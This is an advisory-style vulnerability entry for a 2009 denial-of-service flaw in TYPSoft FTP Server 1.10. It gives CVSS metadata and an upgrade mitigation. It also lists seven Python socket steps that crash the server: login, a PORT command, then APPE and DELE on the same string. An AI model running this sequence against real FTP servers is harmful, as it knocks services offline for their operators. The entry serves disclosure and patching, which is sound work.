vendor:
TYPSoft FTP Server
by:
leinakesi[at]gmail.com
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: TYPSoft FTP Server
Affected Version From: TYPSoft FTP Server Version 1.10
Affected Version To: Earlier versions may also be affected
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Denial of Service vulnerability in TYPSoft FTP Server
Denial of Service vulnerability exists in TYPSoft FTP Server when 'APPE' and 'DELE' commands are used in the same socket connection. If a user could log on the server successfully, taking the following steps will crash the ftp server which would lead to Denial of Service attack: 1.sock.connect((hostname, 21)) 2.sock.send('user %s' %username) 3.sock.send('pass %s' %passwd) 4.sock.send('PORT 127,0,0,1,122,107') 5.sock.send('APPE '+ test_string +'') 6.sock.send('DELE '+ test_string +'') 7.sock.close()
Mitigation:
Upgrade to the latest version of TYPSoft FTP Server